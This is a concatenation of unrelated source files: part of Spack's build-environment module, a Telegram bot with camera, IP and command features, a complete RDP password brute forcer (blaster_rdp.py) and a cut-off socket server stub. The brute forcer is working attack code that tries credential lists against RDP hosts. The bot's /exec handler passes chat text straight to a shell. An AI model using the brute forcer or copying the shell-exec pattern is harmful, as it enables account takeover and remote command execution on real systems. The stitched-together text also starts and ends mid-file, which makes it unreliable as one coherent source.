for libdir in ['lib', 'lib64']:
lib_path = os.path.join(pkg.prefix, libdir)
rpath_dirs.append(lib_path)
# Set up link, include, RPATH directories that are passed to the
# compiler wrapper
for dep in link_deps:
if is_system_path(dep.prefix):
continue
query = pkg.spec[dep.name]
dep_link_dirs = list()
try:
dep_link_dirs.extend(query.libs.directories)
except NoLibrariesError:
tty.debug("No libraries found for {0}".format(dep.name))
for default_lib_dir in ['lib', 'lib64']:
default_lib_prefix = os.path.join(dep.prefix, default_lib_dir)
if os.path.isdir(default_lib_prefix):
dep_link_dirs.append(default_lib_prefix)
link_dirs.extend(dep_link_dirs)
if dep in rpath_deps:
rpath_dirs.extend(dep_link_dirs)
try:
include_dirs.extend(query.headers.directories)
except NoHeadersError:
tty.debug("No headers found for {0}".format(dep.name))
link_dirs = list(dedupe(filter_system_paths(link_dirs)))
include_dirs = list(dedupe(filter_system_paths(include_dirs)))
rpath_dirs = list(dedupe(filter_system_paths(rpath_dirs)))
env.set(SPACK_LINK_DIRS, ':'.join(link_dirs))
env.set(SPACK_INCLUDE_DIRS, ':'.join(include_dirs))
env.set(SPACK_RPATH_DIRS, ':'.join(rpath_dirs))
build_prefixes = [dep.prefix for dep in build_deps]
build_link_prefixes = [dep.prefix for dep in build_link_deps]
# add run-time dependencies of direct build-time dependencies:
for build_dep in build_deps:
for run_dep in build_dep.traverse(deptype='run'):
build_prefixes.append(run_dep.prefix)
# Filter out system paths: ['/', '/usr', '/usr/local']
# These paths can be introduced into the build when an external package
# is added as a dependency. The problem with these paths is that they often
# contain hundreds of other packages installed in the same directory.
# If these paths come first, they can overshadow Spack installations.
build_prefixes = filter_system_paths(build_prefixes)
build_link_prefixes = filter_system_paths(build_link_prefixes)
# Add dependencies to CMAKE_PREFIX_PATH
env.set_path('CMAKE_PREFIX_PATH', build_link_prefixes)
# Set environment variables if specified for
# the given compiler
compiler = pkg.compiler
env.extend(spack.schema.environment.parse(compiler.environment))
if compiler.extra_rpaths:
extra_rpaths = ':'.join(compiler.extra_rpaths)
env.set('SPACK_COMPILER_EXTRA_RPATHS', extra_rpaths)
implicit_rpaths = compiler.implicit_rpaths()
if implicit_rpaths:
env.set('SPACK_COMPILER_IMPLICIT_RPATHS', ':'.join(implicit_rpaths))
# Add bin directories from dependencies to the PATH for the build.
for prefix in build_prefixes:
for dirname in ['bin', 'bin64']:
bin_dir = os.path.join(prefix, dirname)
if os.path.isdir(bin_dir):
env.prepend_path('PATH', bin_dir)
# Add spack build environment path with compiler wrappers first in
# the path. We add the compiler wrapper path, which includes default
# wrappers (cc, c++, f77, f90), AND a subdirectory containing
# compiler-specific symlinks. The latter ensures that builds that
# are sensitive to the *name* of the compiler see the right name when
# we're building with the wrappers.
#
# Conflicts on case-insensitive systems (like "CC" and "cc") are
# handled by putting one in the <build_env_path>/case-insensitive
# directory. Add that to the path too.
env_paths = []
compiler_specific = os.path.join(
spack.paths.build_env_path, pkg.compiler.name)
for item in [spack.paths.build_env_path, compiler_specific]:
env_paths.append(item)
ci = os.path.join(item, 'case-insensitive')
if os.path.isdir(ci):
env_paths.append(ci)
for item in env_paths:
env.prepend_path('PATH', item)
env.set_path(SPACK_ENV_PATH, env_paths)
# Working directory for the spack command itself, for debug logs.
if spack.config.get('config:debug'):
env.set(SPACK_DEBUG, 'TRUE')
env.set(SPACK_SHORT_SPEC, pkg.spec.short_spec)
env.set(SPACK_DEBUG_LOG_ID, pkg.spec.format('{name}-{hash:7}'))
env.set(SPACK_DEBUG_LOG_DIR, spack.main.spack_working_dir)
# Find ccache binary and hand it to build environment
if spack.config.get('config:ccache'):
ccache = Executable('ccache')
if not ccache:
raise RuntimeError("No ccache binary found in PATH")
env.set(SPACK_CCACHE_BINARY, ccache)
# Add any pkgconfig directories to PKG_CONFIG_PATH
for prefix in build_link_prefixes:
for directory in ('lib', 'lib64', 'share'):
pcdir = os.path.join(prefix, directory, 'pkgconfig')
if os.path.isdir(pcdir):
env.prepend_path('PKG_CONFIG_PATH', pcdir)
return env
def _set_variables_for_single_module(pkg, module):
"""Helper function to set module variables for single module."""
# Put a marker on this module so that it won't execute the body of this
# function again, since it is not needed
marker = '_set_run_already_called'
if getattr(module, marker, False):
return
jobs = spack.config.get('config:build_jobs', 16) if pkg.parallel else 1
jobs = min(jobs, multiprocessing.cpu_count())
assert jobs is not None, "no default set for config:build_jobs"
m = module
m.make_jobs = jobs
# TODO: make these build deps that can be installed if not found.
m.make = MakeExecutable('make', jobs)
m.gmake = MakeExecutable('gmake', jobs)
m.scons = MakeExecutable('scons', jobs)
m.ninja = MakeExecutable('ninja', jobs)
# easy shortcut to os.environ
m.env = os.environ
# Find the configure script in the archive path
# Don't use which for this; we want to find it in the current dir.
m.configure = Executable('./configure')
m.meson = Executable('meson')
m.cmake = Executable('cmake')
m.ctest = MakeExecutable('ctest', jobs)
# Standard CMake arguments
m.std_cmake_args = spack.build_systems.cmake.CMakePackage._std_args(pkg)
m.std_meson_args = spack.build_systems.meson.MesonPackage._std_args(pkg)
# Put spack compiler paths in module scope.
link_dir = spack.paths.build_env_path
m.spack_cc = os.path.join(link_dir, pkg.compiler.link_paths['cc'])
m.spack_cxx = os.path.join(link_dir, pkg.compiler.link_paths['cxx'])
m.spack_f77 = os.path.join(link_dir, pkg.compiler.link_paths['f77'])
m.spack_fc = os.path.join(link_dir, pkg.compiler.link_paths['fc'])
# Emulate some shell commands for convenience
m.pwd = os.getcwd
m.cd = os.chdir
m.mkdir = os.mkdir
m.makedirs = os.makedirs
m.remove = os.remove
m.removedirs = os.removedirs
m.symlink = os.symlink
m.mkdirp = mkdirp
m.install = install
m.install_tree = install_tree
m.rmtree = shutil.rmtree
m.move = shutil.move
# Useful directories within the prefix are encapsulated in
# a Prefix object.
m.prefix = pkg.prefix
# Platform-specific library suffix.
m.dso_suffix = dso_suffix
def static_to_shared_library(static_lib, shared_lib=None, **kwargs):
compiler_path = kwargs.get('compiler', m.spack_cc)
compiler = Executable(compiler_path)
return _static_to_shared_library(pkg.spec.architecture, compiler,
static_lib, shared_lib, **kwargs)
m.static_to_shared_library = static_to_shared_library
# Put a marker on this module so that it won't execute the body of this
# function again, since it is not needed
setattr(m, marker, True)
def set_module_variables_for_package(pkg):
"""Populate the module scope of install() with some useful functions.
This makes things easier for package writers.
"""
# If a user makes their own package repo, e.g.
# spack.pkg.mystuff.libelf.Libelf, and they inherit from an existing class
# like spack.pkg.original.libelf.Libelf, then set the module variables
# for both classes so the parent class can still use them if it gets
# called. parent_class_modules includes pkg.module.
modules = parent_class_modules(pkg.__class__)
for mod in modules:
_set_variables_for_single_module(pkg, mod)
def _static_to_shared_library(arch, compiler, static_lib, shared_lib=None,
**kwargs):
"""
Converts a static library to a shared library. The static library has to
be built with PIC for the conversion to work.
Parameters:
static_lib (str): Path to the static library.
shared_lib (str): Path to the shared library. Default is to derive
from the static library's path.
Keyword arguments:
compiler (str): Path to the compiler. Default is spack_cc.
compiler_output: Where to print compiler output to.
arguments (str list): Additional arguments for the compiler.
version (str): Library version. Default is unspecified.
compat_version (str): Library compatibility version. Default is
version.
"""
compiler_output = kwargs.get('compiler_output', None)
arguments = kwargs.get('arguments', [])
version = kwargs.get('version', None)
compat_version = kwargs.get('compat_version', version)
if not shared_lib:
shared_lib = '{0}.{1}'.format(os.path.splitext(static_lib)[0],
dso_suffix)
compiler_args = []
# TODO: Compiler arguments should not be hardcoded but provided by
# the different compiler classes.
if 'linux' in arch or 'cray' in arch:
soname = os.path.basename(shared_lib)
if compat_version:
soname += '.{0}'.format(compat_version)
compiler_args = [
'-shared',
'-Wl,-soname,{0}'.format(soname),
'-Wl,--whole-archive',
static_lib,
'-Wl,--no-whole-archive'
]
elif 'darwin' in arch:
install_name = shared_lib
if compat_version:
install_name += '.{0}'.format(compat_version)
compiler_args = [
'-dynamiclib',
'-install_name', '{0}'.format(install_name),
'-Wl,-force_load,{0}'.format(static_lib)
]
if compat_version:
compiler_args.extend(['-compatibility_version', '{0}'.format(
compat_version)])
if version:
compiler_args.extend(['-current_version', '{0}'.format(version)])
if len(arguments) > 0:
compiler_args.extend(arguments)
shared_lib_base = shared_lib
if version:
shared_lib += '.{0}'.format(version)
elif compat_version:
shared_lib += '.{0}'.format(compat_version)
compiler_args.extend(['-o', shared_lib])
# Create symlinks for version and compat_version
shared_lib_link = os.path.basename(shared_lib)
if version or compat_version:
os.symlink(shared_lib_link, shared_lib_base)
if compat_version and compat_version != version:
os.symlink(shared_lib_link, '{0}.{1}'.format(shared_lib_base,
compat_version))
return compiler(*compiler_args, output=compiler_output)
def get_rpath_deps(pkg):
"""Return immediate or transitive RPATHs depending on the package."""
if pkg.transitive_rpaths:
return [d for d in pkg.spec.traverse(root=False, deptype=('link'))]
else:
return pkg.spec.dependencies(deptype='link')
def get_rpaths(pkg):
"""Get a list of all the rpaths for a package."""
rpaths = [pkg.prefix.lib, pkg.prefix.lib64]
deps = get_rpath_deps(pkg)
rpaths.extend(d.prefix.lib for d in deps
if os.path.isdir(d.prefix.lib))
rpaths.extend(d.prefix.lib64 for d in deps
if os.path.isdir(d.prefix.lib64))
# Second module is our compiler mod name. We use that to get rpaths from
# module show output.
if pkg.compiler.modules and len(pkg.compiler.modules) > 1:
rpaths.append(get_path_from_module(pkg.compiler.modules[1]))
return list(dedupe(filter_system_paths(rpaths)))
def get_std_cmake_args(pkg):
"""List of standard arguments used if a package is a CMakePackage.
Returns:
list of str: standard arguments that would be used if this
package were a CMakePackage instance.
Args:
pkg (PackageBase): package under consideration
Returns:
list of str: arguments for cmake
"""
return spack.build_systems.cmake.CMakePackage._std_args(pkg)
def get_std_meson_args(pkg):
"""List of standard arguments used if a package is a MesonPackage.
Returns:
list of str: standard arguments that would be used if this
package were a MesonPackage instance.
Args:
pkg (PackageBase): package under consideration
Returns:
list of str: arguments for meson
"""
return spack.build_systems.meson.MesonPackage._std_args(pkg)
def parent_class_modules(cls):
"""
Get list of superclass modules that descend from spack.package.PackageBase
Includes cls.__module__
"""
if (not issubclass(cls, spack.package.PackageBase) or
issubclass(spack.package.PackageBase, cls)):
return []
result = []
module = sys.modules.get(cls.__module__)
if module:
result = [module]
for c in cls.__bases__:
result.extend(parent_class_modules(c))
return result
def load_external_modules(pkg):
"""Traverse a package's spec DAG and load any external modules.
Traverse a package's dependencies and load any external modules
associated with them.
Args:
pkg (PackageBase): package to load deps for
"""
for dep in list(pkg.spec.traverse()):
if dep.external_module:
load_module(dep.external_module)
def setup_package(pkg, dirty):
"""Execute all environment setup routines."""
build_env = EnvironmentModifications()
if not dirty:
clean_environment()
set_compiler_environment_variables(pkg, build_env)
set_build_environment_variables(pkg, build_env, dirty)
pkg.architecture.platform.setup_platform_environment(pkg, build_env)
build_env.extend(
modifications_from_dependencies(pkg.spec, context='build')
)
if (not dirty) and (not build_env.is_unset('CPATH')):
tty.debug("A dependency has updated CPATH, this may lead pkg-config"
" to assume that the package is part of the system"
" includes and omit it when invoked with '--cflags'.")
set_module_variables_for_package(pkg)
pkg.setup_build_environment(build_env)
# Loading modules, in particular if they are meant to be used outside
# of Spack, can change environment variables that are relevant to the
# build of packages. To avoid a polluted environment, preserve the
# value of a few, selected, environment variables
# With the current ordering of environment modifications, this is strictly
# unnecessary. Modules affecting these variables will be overwritten anyway
with preserve_environment('CC', 'CXX', 'FC', 'F77'):
# All module loads that otherwise would belong in previous
# functions have to occur after the build_env object has its
# modifications applied. Otherwise the environment modifications
# could undo module changes, such as unsetting LD_LIBRARY_PATH
# after a module changes it.
for mod in pkg.compiler.modules:
# Fixes issue https://github.com/spack/spack/issues/3153
if os.environ.get("CRAY_CPU_TARGET") == "mic-knl":
load_module("cce")
load_module(mod)
# kludge to handle cray libsci being automatically loaded by PrgEnv
# modules on cray platform. Module unload does no damage when
# unnecessary
module('unload', 'cray-libsci')
if pkg.architecture.target.module_name:
load_module(pkg.architecture.target.module_name)
load_external_modules(pkg)
# Make sure nothing's strange about the Spack environment.
validate(build_env, tty.warn)
build_env.apply_modifications()
def modifications_from_dependencies(spec, context):
"""Returns the environment modifications that are required by
the dependencies of a spec and also applies modifications
to this spec's package at module scope, if need be.
Args:
spec (Spec): spec for which we want the modifications
context (str): either 'build' for build-time modifications or 'run'
for run-time modifications
"""
env = EnvironmentModifications()
pkg = spec.package
# Maps the context to deptype and method to be called
deptype_and_method = {
'build': (('build', 'link', 'test'),
'setup_dependent_build_environment'),
'run': (('link', 'run'), 'setup_dependent_run_environment')
}
deptype, method = deptype_and_method[context]
for dspec in spec.traverse(order='post', root=False, deptype=deptype):
dpkg = dspec.package
set_module_variables_for_package(dpkg)
# Allow dependencies to modify the module
dpkg.setup_dependent_package(pkg.module, spec)
getattr(dpkg, method)(env, spec)
return env
def fork(pkg, function, dirty, fake):
"""Fork a child process to do part of a spack build.
Args:
pkg (PackageBase): package whose environment we should set up the
forked process for.
function (callable): argless function to run in the child
process.
dirty (bool): If True, do NOT clean the environment before
building.
fake (bool): If True, skip package setup b/c it's not a real build
Usage::
def child_fun():
# do stuff
build_env.fork(pkg, child_fun)
Forked processes are run with the build environment set up by
spack.build_environment. This allows package authors to have full
control over the environment, etc. without affecting other builds
that might be executed in the same spack call.
If something goes wrong, the child process catches the error and
passes it to the parent wrapped in a ChildError. The parent is
expected to handle (or re-raise) the ChildError.
"""
def child_process(child_pipe, input_stream):
# We are in the child process. Python sets sys.stdin to
# open(os.devnull) to prevent our process and its parent from
# simultaneously reading from the original stdin. But, we assume
# that the parent process is not going to read from it till we
# are done with the child, so we undo Python's precaution.
if input_stream is not None:
sys.stdin = input_stream
try:
if not fake:
setup_package(pkg, dirty=dirty)
return_value = function()
child_pipe.send(return_value)
except StopPhase as e:
# Do not create a full ChildError from this, it's not an error
# it's a control statement.
child_pipe.send(e)
except BaseException:
# catch ANYTHING that goes wrong in the child process
exc_type, exc, tb = sys.exc_info()
# Need to unwind the traceback in the child because traceback
# objects can't be sent to the parent.
tb_string = traceback.format_exc()
# build up some context from the offending package so we can
# show that, too.
package_context = get_package_context(tb)
build_log = None
if hasattr(pkg, 'log_path'):
build_log = pkg.log_path
# make a pickleable exception to send to parent.
msg = "%s: %s" % (exc_type.__name__, str(exc))
ce = ChildError(msg,
exc_type.__module__,
exc_type.__name__,
tb_string, build_log, package_context)
child_pipe.send(ce)
finally:
child_pipe.close()
parent_pipe, child_pipe = multiprocessing.Pipe()
input_stream = None
try:
# Forward sys.stdin when appropriate, to allow toggling verbosity
if sys.stdin.isatty() and hasattr(sys.stdin, 'fileno'):
input_stream = os.fdopen(os.dup(sys.stdin.fileno()))
p = multiprocessing.Process(
target=child_process, args=(child_pipe, input_stream))
p.start()
except InstallError as e:
e.pkg = pkg
raise
finally:
# Close the input stream in the parent process
if input_stream is not None:
input_stream.close()
child_result = parent_pipe.recv()
p.join()
# If returns a StopPhase, raise it
if isinstance(child_result, StopPhase):
# do not print
raise child_result
# let the caller know which package went wrong.
if isinstance(child_result, InstallError):
child_result.pkg = pkg
if isinstance(child_result, ChildError):
# If the child process raised an error, print its output here rather
# than waiting until the call to SpackError.die() in main(). This
# allows exception handling output to be logged from within Spack.
# see spack.main.SpackCommand.
child_result.print_context()
raise child_result
return child_result
def get_package_context(traceback, context=3):
"""Return some context for an error message when the build fails.
Args:
traceback (traceback): A traceback from some exception raised during
install
context (int): Lines of context to show before and after the line
where the error happened
This function inspects the stack to find where we failed in the
package file, and it adds detailed context to the long_message
from there.
"""
def make_stack(tb, stack=None):
"""Tracebacks come out of the system in caller -> callee order. Return
an array in callee -> caller order so we can traverse it."""
if stack is None:
stack = []
if tb is not None:
make_stack(tb.tb_next, stack)
stack.append(tb)
return stack
stack = make_stack(traceback)
for tb in stack:
frame = tb.tb_frame
if 'self' in frame.f_locals:
# Find the first proper subclass of PackageBase.
obj = frame.f_locals['self']
if isinstance(obj, spack.package.PackageBase):
break
# We found obj, the Package implementation we care about.
# Point out the location in the install method where we failed.
lines = [
'{0}:{1:d}, in {2}:'.format(
inspect.getfile(frame.f_code),
frame.f_lineno - 1, # subtract 1 because f_lineno is 0-indexed
frame.f_code.co_name
)
]
# Build a message showing context in the install method.
sourcelines, start = inspect.getsourcelines(frame)
# Calculate lineno of the error relative to the start of the function.
# Subtract 1 because f_lineno is 0-indexed.
fun_lineno = frame.f_lineno - start - 1
start_ctx = max(0, fun_lineno - context)
sourcelines = sourcelines[start_ctx:fun_lineno + context + 1]
for i, line in enumerate(sourcelines):
is_error = start_ctx + i == fun_lineno
mark = '>> ' if is_error else ' '
# Add start to get lineno relative to start of file, not function.
marked = ' {0}{1:-6d}{2}'.format(
mark, start + start_ctx + i, line.rstrip())
if is_error:
marked = colorize('@R{%s}' % cescape(marked))
lines.append(marked)
return lines
class InstallError(spack.error.SpackError):
"""Raised by packages when a package fails to install.
Any subclass of InstallError will be annotated by Spack wtih a
``pkg`` attribute on failure, which the caller can use to get the
package for which the exception was raised.
"""
class ChildError(InstallError):
"""Special exception class for wrapping exceptions from child processes
in Spack's build environment.
The main features of a ChildError are:
1. They're serializable, so when a child build fails, we can send one
of these to the parent and let the parent report what happened.
2. They have a ``traceback`` field containing a traceback generated
on the child immediately after failure. Spack will print this on
failure in lieu of trying to run sys.excepthook on the parent
process, so users will see the correct stack trace from a child.
3. They also contain context, which shows context in the Package
implementation where the error happened. This helps people debug
Python code in their packages. To get it, Spack searches the
stack trace for the deepest frame where ``self`` is in scope and
is an instance of PackageBase. This will generally find a useful
spot in the ``package.py`` file.
The long_message of a ChildError displays one of two things:
1. If the original error was a ProcessError, indicating a command
died during the build, we'll show context from the build log.
2. If the original error was any other type of error, we'll show
context from the Python code.
SpackError handles displaying the special traceback if we're in debug
mode with spack -d.
"""
# List of errors considered "build errors", for which we'll show log
# context instead of Python context.
build_errors = [('spack.util.executable', 'ProcessError')]
def __init__(self, msg, module, classname, traceback_string, build_log,
context):
super(ChildError, self).__init__(msg)
self.module = module
self.name = classname
self.traceback = traceback_string
self.build_log = build_log
self.context = context
@property
def long_message(self):
out = StringIO()
out.write(self._long_message if self._long_message else '')
if (self.module, self.name) in ChildError.build_errors:
# The error happened in some external executed process. Show
# the build log with errors or warnings highlighted.
if self.build_log and os.path.exists(self.build_log):
errors, warnings = parse_log_events(self.build_log)
nerr = len(errors)
nwar = len(warnings)
if nerr > 0:
# If errors are found, only display errors
out.write(
"\n%s found in build log:\n" % plural(nerr, 'error'))
out.write(make_log_context(errors))
elif nwar > 0:
# If no errors are found but warnings are, display warnings
out.write(
"\n%s found in build log:\n" % plural(nwar, 'warning'))
out.write(make_log_context(warnings))
else:
# The error happened in in the Python code, so try to show
# some context from the Package itself.
if self.context:
out.write('\n')
out.write('\n'.join(self.context))
out.write('\n')
if out.getvalue():
out.write('\n')
if self.build_log and os.path.exists(self.build_log):
out.write('See build log for details:\n')
out.write(' %s\n' % self.build_log)
return out.getvalue()
def __str__(self):
return self.message + self.long_message + self.traceback
def __reduce__(self):
"""__reduce__ is used to serialize (pickle) ChildErrors.
Return a function to reconstruct a ChildError, along with the
salient properties we'll need.
"""
return _make_child_error, (
self.message,
self.module,
self.name,
self.traceback,
self.build_log,
self.context)
def _make_child_error(msg, module, name, traceback, build_log, context):
"""Used by __reduce__ in ChildError to reconstruct pickled errors."""
return ChildError(msg, module, name, traceback, build_log, context)
class StopPhase(spack.error.SpackError):
"""Pickle-able exception to control stopped builds."""
def __reduce__(self):
return _make_stop_phase, (self.message, self.long_message)
def _make_stop_phase(msg, long_msg):
return StopPhase(msg, long_msg)
|
all_bots.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@author: josem
Bot de Telegram que devuelve la IP del servidor
Adaptado de los bots de Alberto disponibles en umucv
"""
# Libreria Telegram
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters
# OpenCV
import cv2 as cv
# Enviar bytes
from io import BytesIO
# Para cargar una imagen
from PIL import Image
# Para cargar una imagen dado el path
import skimage.io as io
# Stream de la camara
from umucv.stream import Camera
# Hilos
import threading
# Ejecutar comandos
import subprocess
# Manejo del sistema
import os
# Updater con el token del bot (otorogado por BotFather)
updater = Updater('TOKEN')
# Mi id de usuario de Telegram (otorogado por IDBot)
my_id = 0
# Camara activada
cam_enabled = False
# Camara
if cam_enabled:
cam = Camera(dev='0', size=(640, 480))
# Directorio actual (para execute)
dir_path = subprocess.check_output("pwd").decode('utf-8')[:-1]
# Comando para iniciar el bot
# Recibe el bot y el evento nuevo
def start(bot, update):
# Responde al mensage recibido
update.message.reply_text("Estoy vivo!")
# Comando para saludar en el chat
# Recibe el bot y el evento nuevo
def hello(bot, update):
# Responde al mensage recibido
update.message.reply_text("Hola {}".format(update.message.from_user.first_name))
# Cierra la camara y el hilo del updater
def shutdown():
updater.stop()
updater.is_idle = False
if cam_enabled:
cam.stop()
# Comando para detener el bot, lanza shutdown
# Recibe el bot y el evento nuevo
def stop(bot, update):
# Id del chat
cid = update.message.chat_id
if cid == my_id:
# Responde al mensage recibido
update.message.reply_text("Bye!")
# Lanza shutdown
threading.Thread(target=shutdown).start()
else:
update.message.reply_text("Bot privado!")
# Ejecuta el comando para obtener la ip
def ip():
# Convierte a string utf-8 y elimina el espacio + salto de linea del final
return subprocess.check_output(["hostname", "-I"]).decode('utf-8')[:-2]
# Comando para enviar la ip
# Recibe el bot y el evento nuevo
def get_ip(bot, update):
# Id del chat
cid = update.message.chat_id
if cid == my_id:
# Envia el mensaje con la ip
update.message.reply_text("Mi IP es {}".format(ip()))
else:
update.message.reply_text("Bot privado!")
# Envia imagen
# Recibe el bot, el id del chat y el frame
def send_image(bot, cid, frame):
# Convierte a RGB
frame = cv.cvtColor(frame, cv.COLOR_BGR2RGB)
# Carga imagen dada el array que es el frame
image = Image.fromarray(frame, mode='RGB')
# Crea el stream de bytes
byte_io = BytesIO()
# Guarda la imagen en formato PNG en el stream
image.save(byte_io, 'PNG')
# Pone el stream en la posicion 0
byte_io.seek(0)
# El bot envia la foto al chat
bot.sendPhoto(chat_id=cid, photo=byte_io)
# Comando para enviar una imagen (captura)
# Recibe el bot y el evento nuevo
def get_image(bot, update):
# Id del chat
cid = update.message.chat_id
if cid == my_id:
if cam_enabled:
# Captura de la camara
img = cam.frame
# Envia la imagen
send_image(bot, cid, img)
else:
update.message.reply_text("No hay webcam")
else:
update.message.reply_text("Bot privado!")
# Comando que imprime los argumentos (echo)
# Recibe el bot, el evento nuevo y los argumentos
def echo(bot, update, args):
# Une los elementos de args y separa con espacios
update.message.reply_text(" ".join(args))
# Comando que ejecuta un comando en la terminal
# Recibe el bot, el evento nuevo y los argumentos
def execute(bot, update, args):
global dir_path
# Id del chat
cid = update.message.chat_id
if cid == my_id:
# Prompt = whoami + hostname + pwd
user = subprocess.check_output("whoami").decode('utf-8')[:-1]
host = subprocess.check_output("hostname").decode('utf-8')[:-1]
prompt = user + "@" + host + ":" + dir_path + " $ " + " ".join(args) + "\n"
# Actualiza el directorio actual si es cd
if args[0] == "cd":
# Path es el home del usuario
if len(args) < 2:
dir_path = "/home/"+user
out = ""
# Si hay path, debe existir
elif os.path.isdir(args[1]):
dir_path = args[1]
out = ""
# Si no, error
else:
out = "No existe el directorio"
# Ejecuta el comando (argumentos) y convierte a string utf-8
command = " ".join(args)
try:
# Con shell=True se pasa una cadena de texto y permite ejecutar comandos con pipes
out = subprocess.check_output(command, shell=True, cwd=dir_path).decode('utf-8')[:-1]
except subprocess.CalledProcessError:
out = "Error ejecutando el comando (exit status diferente de 0)"
# Envia el mensaje con la salida y elimina el salto de linea del final
update.message.reply_text(prompt+out)
else:
update.message.reply_text("Bot privado!")
# Comando que procesa un mensaje del usuario y lo devuelve invertido
# Recibe el bot y el evento nuevo
def process_text(bot, update):
update.message.reply_text(update.message.text[::-1])
# Comando que procesa una imagen del usuario y la devuelve en gris
# Recibe el bot y el evento nuevo
def process_image(bot, update):
# El identificador de la ultima foto
file_id = update.message.photo[-1].file_id
# Path para el archivo
path = bot.get_file(file_id)['file_path']
# Carga la imagen dado el path
img = io.imread(path)
# Responde con las dimensiones de la imagen
update.message.reply_text("{}x{}".format(img.shape[1], img.shape[0]))
# Imagen en gris
r = cv.cvtColor(cv.cvtColor(img, cv.COLOR_RGB2GRAY), cv.COLOR_GRAY2RGB)
# Envia la imagen
send_image(bot, update.message.chat_id, r)
# Main
def main():
# Manejadores
updater.dispatcher.add_handler(CommandHandler('start', start))
updater.dispatcher.add_handler(CommandHandler('hello', hello))
updater.dispatcher.add_handler(CommandHandler('stop', stop))
updater.dispatcher.add_handler(CommandHandler('ip', get_ip))
updater.dispatcher.add_handler(CommandHandler('image', get_image))
updater.dispatcher.add_handler(CommandHandler('echo', echo, pass_args=True))
updater.dispatcher.add_handler(CommandHandler('exec', execute, pass_args=True))
updater.dispatcher.add_handler(MessageHandler(Filters.text, process_text))
updater.dispatcher.add_handler(MessageHandler(Filters.photo, process_image))
# Comienza el bot
updater.start_polling()
# Mensaje inicial
bot = updater.bot
bot.sendMessage(chat_id=my_id, text="Mi IP es {}".format(ip()))
# Bloquea la ejecucion hasta que se para el bot
updater.idle()
# Programa principal
if __name__ == '__main__':
main()
|
blaster_rdp.py | #!/usr/bin/env python2
# This is
#
#
# by sn0wfa11
import sys
try:
import os
import socket
import multiprocessing
import threading
import argparse
import subprocess
import re
import time
from lib.common import *
from lib.network import *
except Exception, err:
print >> sys.stderr, err
sys.exit(1)
usernames = []
passwords = []
hosts = []
ports = []
xfreerdp_path = "/usr/bin/xfreerdp"
rdp_success = "Authentication only, exit status 0"
global verbose, delay, pairwise
# List Import Functions
def get_usernames(filename):
check_file(filename)
with open(filename) as user_file:
for line in user_file:
line = line.strip()
if line != "":
usernames.append(line)
def get_passwords(filename):
check_file(filename)
with open(filename) as pass_file:
for line in pass_file:
line = line.strip()
if line != "":
passwords.append(line)
def get_hosts(filename):
check_file(filename)
with open(filename) as host_file:
for line in host_file:
split_host_port(line)
def split_host_port(host_input):
host_port = host_input.split(':')
host_port = [x.strip() for x in host_port]
if host_port[0]:
hosts.append(host_port[0])
if len(host_port) < 2:
ports.append(3389)
else:
ports.append(int(host_port[1]))
# Get the appropreate number of processes, no need for more than you have hosts
def process_count():
if len(hosts) < multiprocessing.cpu_count():
return len(hosts)
else:
return multiprocessing.cpu_count()
# Test a single rdp login option
def rdp_connect(host, port, username, password):
match = False
rdp = subprocess.Popen([xfreerdp_path, "/v:" + host, "/port:" + str(port), "/u:" + username, "/p:" + password, "/cert-ignore", "+auth-only"], shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
for line in iter(rdp.stderr.readline, ''):
if re.search(rdp_success, line):
match = True
break
if match:
print_good("Login found on " + host + " -> " + username + ":" + password)
else:
printv_nomatch(username + ":" + password + " no match on " + host, verbose)
pass
# Username and password checking
# Spawns a thread for each combination based on pairwise or not
def check_up(host, port, host_event, host_last):
if not port_open(host, port):
print_nomatch("Unable to connect to: " + host + ":" + str(port))
else:
up_threads = []
errored = False
if pairwise:
for x in range(0, len(usernames)):
if not port_open(host, port):
print_nomatch("Unable to connect to: " + host + ":" + str(port))
break
else:
up_thread = threading.Thread(target=rdp_connect, args=(host, port, usernames[x], passwords[x]))
time.sleep(0.4)
up_thread.start()
up_threads.append(up_thread)
else:
for username in usernames:
for password in passwords:
if not port_open(host, port):
errored = True
break
else:
up_thread = threading.Thread(target=rdp_connect, args=(host, port, username, password))
time.sleep(0.4)
up_thread.start()
up_threads.append(up_thread)
if errored:
print_nomatch("Unable to connect to: " + host + ":" + str(port))
break
for thread in up_threads:
thread.join()
if host_last:
host_event.set()
pass
# Runs through the host list, multiprocessing by host
def run_hosts():
host_last = False
host_pool = multiprocessing.Pool(process_count())
host_manager = multiprocessing.Manager()
host_event = host_manager.Event()
for x in range(0, len(hosts)):
if hosts[x] == hosts[len(hosts) - 1]:
host_last = True
host_pool.apply_async(check_up, (hosts[x], ports[x], host_event, host_last))
host_pool.close()
host_event.wait()
host_pool.terminate()
# Argument parser
def parse_args(args, parser):
global verbose, delay, pairwise
verbose = args.verbose
pairwise = args.pairwise
if args.host:
split_host_port(args.host)
if args.host_file:
get_hosts(args.host_file)
if len(hosts) < 1:
print_exit("You must specify at least one host!", parser)
if args.username:
usernames.append(args.username)
if args.user_file:
get_usernames(args.user_file)
if len(usernames) < 1:
print_exit("You must specify at least one username!", parser)
if args.password:
passwords.append(args.password)
if args.pass_file:
get_passwords(args.pass_file)
if len(passwords) < 1:
print_exit("You must specify at least one password!", parser)
# Main Function
def main(argv):
parser = argparse.ArgumentParser(description = "RDP login brute forcer.")
parser.add_argument("-u", "--username", type = str, help = "Single username to test")
parser.add_argument("-U", "--user_file", type = str, help = "File containing usernames. One per line.")
parser.add_argument("-p", "--password", type = str, help = "Single password to test")
parser.add_argument("-P", "--pass_file", type = str, help = "File containing passwords. One per line.")
parser.add_argument("-t", "--host", type = str, help = "Single host to test. <host> or <host>:<port> IPv6 is ok too.")
parser.add_argument("-T", "--host_file", type = str, help = "File containing hosts. One per line. <host> or <host>:<port> IPv6 is ok too.")
parser.add_argument("-v", "--verbose", action = "store_true", help = "Display all host:username:password tests.")
parser.add_argument("-w", "--pairwise", action = "store_true", help = "Test username and password combos in line by line match. Must have same number of each!")
args = parser.parse_args()
if len(argv) == 1:
help_exit(parser)
parse_args(args, parser)
print_status("Starting brute force...")
if pairwise and (len(usernames) != len(passwords)):
print_error("Username and password numbers do not match in pairwise mode! Exiting...")
sys.exit(4)
run_hosts()
print_status("Done.")
# Ref to main function
if __name__ == "__main__":
try:
main(sys.argv)
except KeyboardInterrupt:
print "\n\n[*] Exiting..."
sys.exit(3)
|
test.py | import socket as s
import struct
import numpy as np
import threading
import yolo
port = 4444
serversocket = s.socket()
serversocket.bind((s.gethostname(), port))
